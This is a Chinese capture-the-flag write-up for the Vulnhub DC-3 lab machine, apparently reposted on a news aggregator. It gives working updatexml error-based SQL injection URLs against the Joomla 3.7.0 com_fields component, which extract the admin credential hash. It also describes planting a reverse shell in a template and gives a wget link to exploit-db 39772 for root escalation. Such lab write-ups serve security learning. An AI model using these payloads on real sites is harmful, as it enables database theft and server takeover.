当前位置: 首页 > news >正文

Vulnhub DC-3 --手搓sql

DC-3

  1. 主机扫描

  1. 端口扫描

  1. 目录扫描

存在目录administrator

  1. 只开放80端口,访问页面

根据flag提示,只有一个flag,需要获取到root权限

访问扫描出的adminstrator页面

  1. 页面显示joomla

基于PHP和MySQL开发的开源内容管理系统(CMS)

查详细版本看是否有详细漏洞可利用

查询了下kali本身没有预装joomscan

需要安装git https://github.com/OWASP/joomscan.git

perl joomscan.pl -u 192.168.68.138

查看joomla3.7.0是否有可利用漏洞

Sql注入和跨站脚本攻击xss

用sql注入,没有登录用户xss用处不大

Updatexml报错注入然后使用的sqlmap

  1. 手搓

#爆数据库名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,database()),1)

#爆破表名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

limit 90,1最后回显,88,1为#__users表

#爆表中列名

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select column_name from information_schema.columns where table_name='#__users' limit 0,1),0x7e),1) ----怎么试都报错

可用嵌套

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 88,1) limit 4,1),0x7e),1)

得到password 关键字,猜测用户名字段为:username

#爆用户名密码

http://192.168.68.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(0x7e,substring((select concat(username,0x3a,password) from %23__users limit 0,1),1,30),0x7e),1)

31,30 61,30密码全部取出

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

解密网站https://hashes.com/en/decrypt/hash 解密密码为:snoopy

登录网站

路径Extensions-Templates-Templates

新建添加反弹shell保存

扫描页面是有目录

http://192.168.68.138/templates/

显示页面编辑在templates的beez3

Kali上监听端口

尝试访问http://192.168.68.138/templates/beez3/html/test.php

拿到shell,查看系统版本

  1. 查询系统版本后寻找漏洞

本地权限提升都试了一边只有39772.txt成功了

Txt中提供了下载压缩包及使用方法,下载

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

上传到目标机

目标机下载

解压zip unzip 39772.zip

解压exploit.tar tar -xf exploit.tar

运行报错发现没有添加运行权限,添加权限后重新运行

拿到root权限找到flag

http://www.jsqmd.com/news/493527/

相关文章:

  • leetcode 274 H指数
  • 6 个让我作为软件工程师生活更轻松的工具
  • 图片旋转判断生产环境应用:高并发图片流中实时角度识别方案
  • Qwen3-ForcedAligner-0.6B方言支持测评:22种中文方言对齐效果
  • 手把手教你搭建!Fun-ASR-MLT-Nano-2512语音识别Web界面快速上手
  • NEURAL MASK 实战:集成YOLOv8实现智能目标检测与视觉重构
  • django flask+uniapp的个人理财家庭财务收支系统422vl 小程序
  • 清音听真实战:快速处理带背景音乐录音,识别效果实测
  • 双元法实战:从基础到高阶的不定积分求解技巧
  • 通义千问1.5-1.8B-Chat-GPTQ-Int4与MATLAB联动:科学计算问题求解与可视化建议
  • 清音刻墨·Qwen3应用场景:播客剪辑中自动定位金句并生成时间戳摘要
  • Qwen3-ASR-1.7B算法解析:从卷积神经网络到语音识别
  • 构建韧性数据库架构
  • 企业级文档处理新选择:Glyph视觉推理零基础入门指南
  • 多语种跨境业务:SenseVoice-Small ONNX模型外贸会议转录案例
  • 开源人脸分析系统部署教程:Face Analysis WebUI适配A10/A100/V100多卡GPU算力
  • 2026高职统计与大数据分析毕业缺少实战经验怎么办?
  • PyQt5与PyQt5-tools安装全攻略:从环境配置到QT Designer集成
  • 5分钟看懂PON系统中的VLAN配置:PUPV和PUPSPV到底怎么选?
  • 突破跨平台壁垒:Nigate实现Mac与NTFS设备无缝协作的创新方案
  • seismic cluster analysis
  • SenseVoice语音识别快速上手:一键部署多语言转写Web界面
  • OFA-Image-Caption模型文件读写优化:处理海量图片流的高效本地缓存策略
  • 健康管家 App Tech Support
  • 最长回文子串算法精解(Leetcode热题100,第5题)
  • 从‘一次性‘到‘长期‘:微信小程序订阅消息模板全解析与 wx.requestSubscribeMessage 实战配置
  • 7B模型仅需14G显存!揭秘QLoRA显存优化秘籍,轻松跑大模型!
  • 唐师兄传承中医智慧,守护现代健康
  • Python爬虫数据清洗利器:用StructBERT智能去重与内容聚合
  • 比迪丽LoRA模型IDEA插件开发构想:代码注释自动图解